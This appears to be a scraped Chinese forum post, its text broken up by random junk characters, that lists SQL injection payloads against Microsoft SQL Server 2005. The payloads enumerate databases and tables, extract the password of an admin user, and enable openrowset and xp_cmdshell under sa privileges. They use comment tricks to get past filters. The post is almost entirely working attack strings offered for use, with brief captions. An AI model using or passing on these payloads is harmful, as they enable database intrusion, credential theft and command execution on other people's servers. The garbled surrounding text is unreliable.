8 D& h0 o% L& e4 y+ f0 x: O
. g% W9 S2 w4 _* K% g8 C2 o5 p. S
+ Y; B+ n4 I( [: c# f[Copy to clipboard]CODE:- O: {3 b7 W7 ~7 d2 g2 [
/**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[master].[dbo].[sysdatabases]/**/order/**/by/**/dbid/**/desc))%3d0--* ?1 ^1 ]5 p, F/ s
' N. U: j5 g0 s! a" {5 W6 x+ J爆表语句,somedb部份是所要列的数据库,红色数字1累加" Z" z- D, l# U/ }; ?) h1 b V
5 [2 Y; A% I& f: {; A
$ q: p4 @( h' E6 l. \
[Copy to clipboard]CODE:- m) p [$ X$ x" r
/**/and/**/(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))/**/from/**/(select/**/top/**/1/**/name/**/from/**/somedb.sys.all_objects/**/where/**/type%3dchar(85)/**/order/**/by/**/name)/**/t/**/order/**/by/**/name/**/desc)%3d0--
( B% ^5 \. ^) q5 l' N# m3 W5 c8 E. p1 r \
爆字段语句,爆表admin里user='icerover'的密码段
* |# n% U9 a) U, G7 e4 @. q# C1 Q1 _: q6 z7 f/ Y
. W$ V1 ?7 H$ \8 {[Copy to clipboard]CODE:" z( F, z1 m' G4 h0 C
**/And/**/(Select/**/Top/**/1/**/isNull(cast([password]/**/as/**/varchar(2000)),char(32))%2bchar(124)/**/From/**/(Select/**/Top/**/1/**/[password]/**/From/**/[somedb]..[admin]/**/Where/**/user='icerover'/**/Order/**/by/**/[password])/**/T/**/Order/**/by/**/[password]Desc)%3d0--
- }5 M- Q& o, E/ G* n+ O
2 @6 z e. J; G. j& ^5 dmssql2005默认没有开xp_cmdshell的,openrowset也不能用. f0 m6 f. u6 v! K6 L0 S5 E( o
如果是sa权限,可以这样来开启7 ]8 G7 o; i# O& U8 j! r1 F
开启openrowset
1 \5 m; y. f$ R9 @& S, k' @' r3 K* A! f6 D' f' N2 s" z7 [
" G5 p" b: l2 F
[Copy to clipboard]CODE:
: B7 `8 v: b" x/**/sp_configure/**/'show/**/advanced/**/options',/**/1;RECONFIGURE;--
+ W$ p- `: s0 D# A; O4 H/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',/**/1;RECONFIGURE;--
3 Q$ z( @. e9 p
4 u5 L# e: t% L1 T6 p2 y! n9 ]开启xp_cmdshell
! e' B% Q' k* y! } ?8 b- }; M: B8 S. P- M+ q$ f5 }6 {; R. v
$ W1 Q2 t5 c) p4 n" e
[Copy to clipboard]CODE:- s }$ X7 a5 w, L' g7 G
EXEC/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',1;RECONFIGURE;--& D4 `8 Q9 l2 H+ \
EXEC/**/sp_configure/**/'show/**/advanced/**/options',1;RECONFIGURE;EXEC/**/sp_configure/**/'xp_cmdshell',1;RECONFIGURE;--6 d& S/ b/ j" y: J" E
+ ^- I6 k- Z, h2 t; Gok,over~~晚安! u& G) \( s e9 w8 u& d
|